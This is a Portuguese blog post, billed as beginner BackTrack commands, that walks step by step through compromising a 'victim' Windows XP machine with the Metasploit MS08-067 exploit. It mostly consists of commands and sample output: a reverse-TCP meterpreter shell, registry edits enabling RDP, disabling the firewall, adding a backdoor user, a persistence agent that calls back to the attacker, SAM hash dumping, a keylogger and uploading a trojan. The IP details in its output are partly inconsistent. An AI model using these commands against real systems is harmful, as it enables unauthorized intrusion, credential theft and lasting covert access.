Comandos Básico no BACKTRACK para Iniciantes

Marcos
Simples conexão, Mas Bem Divertido
Abra o console e digite: msfconsole
msf >use windows/smb/ms08_067_netapi
msf >exploit(ms08_067_netapi) >set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf >exploit(ms08_067_netapi) >set LHOST 192.168.0. 0 IP do Cliente (Seu IP)
lhost => 192.168.0.0
msf >exploit(ms08_067_netapi) >set RHOST 192.168.1.1 IP do Servidor (Vitima)
rhost => 192.168.1.1
msf >exploit(ms08_067_netapi) >set LPORT 4444 Porta Padrão
msf >exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Portuguese - Brazilian
[*] Selected Target: Windows XP SP3 Portuguese - Brasilian (NX)
[*] Attempting to trigger the vulnerability....
[*] Sending stage (752128 bytes) to 192.168.0.0
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.0.0:1035 at 2012-07-06 02:15 -0500

meterpreter >
Digite: ipconfig, Vai Listar as interface da vitima
EX: meterpreter>ipconfig
Digite: sysinfo, Vai Lista O Sistema de Informação da vitima
EX:meterpreter>sysinfor
Computer : VITIMA-D880F4A3B
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : pt_BR
Meterpreter : x86/win32

Digite ps, Vai Listar, A Lista de Processos da vitima
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0
428 320 explorer.exe x86 0 VITIMA-D880F4A3B\Administrador C:\WINDOWS\Explorer.EXE
552 4 smss.exe x86 0 AUTORIDADE NT\SYSTEM \SystemRoot\System32\smss.exe
616 552 csrss.exe x86 0 AUTORIDADE NT\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
.....
Caso queira desativar algum processo
Digite: kill
Ex: meterpreter > kill 552

Se a poderi do processo explorer.exe com o seguinte comando: migrate + o numero do processo
EX:meterpreter > migrate 428
[*] Migrating to 428...
[*] Migration completed successfully.

Digite getuid, Vai mostrar o nome o adimin da vitima
meterprter > getuid
Server username: VITIMA-D880F4A3B\Administrador

Digite shell, Vai entra no console da vitima
meterpreter >shell
Process 4024 created.
Channel 1 created.
Microsoft Windows XP [vers�o 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrador>
Va ate a pasta system32
Digite: cd
EX: C:\Documents and Settings\Administrador>cd\
Digite: cd windows/system32
EX: C:\>cd windows/system32

C:\WINDOWS\system32> Agora vc ta na pasta system32

Perpare-se para RDP, com o seguinte comando:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Assim:
C:\WINDOWS\system32>reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

E o outro comando:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
Assim:
C:\WINDOWS\system32>reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

Agora Ativar e Desativar o Firewall da Vitima, com o seguinte comando:
Netsh firewall set opmode enable NOTA: ATIVAR
Netsh firewall set opmode disable NOTA: DESATIVAR
C:\WINDOWS\system32>Netsh firewall set opmode enable
C:\WINDOWS\system32>Netsh firewall set opmode disable

Criar uma conta de Usuario no PC da Vitima, com o seguinte comando:
net user [USERNAME] [PASSWORD] /add
EX: C:\WINDOWS\system32>net user Private abcd1234 /add
Private, é o nome de usuario da conta, pode ser qualquer nome
abcd1234, é a senha, qualquer senha
Criada a conta de usuario
Ctrl + z e y pra sair do shell (console)
meterpreter >

Configurando backdoors para uso futuro. com o seguinte comando:
run persistence -r [Seu IP] -p [Sua Porta] -A -X -i 300
EX: meterpreter > run persistence -r 192.168.0.0 -p 443 -A -X -i 300
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/ .msf4/log/persistence/Cliente_PC201202222.3842/Cliente_PC201202222.3842.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.0 LPORT=443
[*] Persistent agent Script is 609600 bytes long
[+] Persistent Script written to C:\Usuarios\Vitima\AppData\Local\Tem\agDcmcMuDthQD.vbs
[*] Starting connection hantler at port 443 for windows/meterpreter/reverse_tcp
[+] Multi/Hantler started!
[*] Executing script C:\Usuarios\Vitima\AppData\Local\Tem\agDcmcMuDthQD.vbs
[+] Agente executed winth PID 4664
[*] Installing into autorun as HKLM\Software\Micosoft\CurrentVesion\Run\VxEMqmdWo
[+] Installed into autorun as HKLM\Software\Micosoft\CurrentVesion\Run\VxEMqmdWo
meterpreter >

Logar como system
meterpreter > getsystem
Ganhar privilegios
meterpreter > user priv
Executar um comando na maquina remota
meterpreter > execute -f cmd.exe -i –H
Exibir a lista do banco de dados SAM
meterpreter > run post/windows/gather/hashdump
Iniciar um keylogger nativo do meterpreter
meterpreter > keyscan_start
Para o keylogger
meterpreter > keyscan_stop
Analisar o que foi capturado e
meterpreter > keyscan_dump
Enviar um arquivo
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Copiar um arquivo
meterpreter > download c:\\boot.ini Pode ser qualquer coisa que vc queira

0 comentários:

Postar um comentário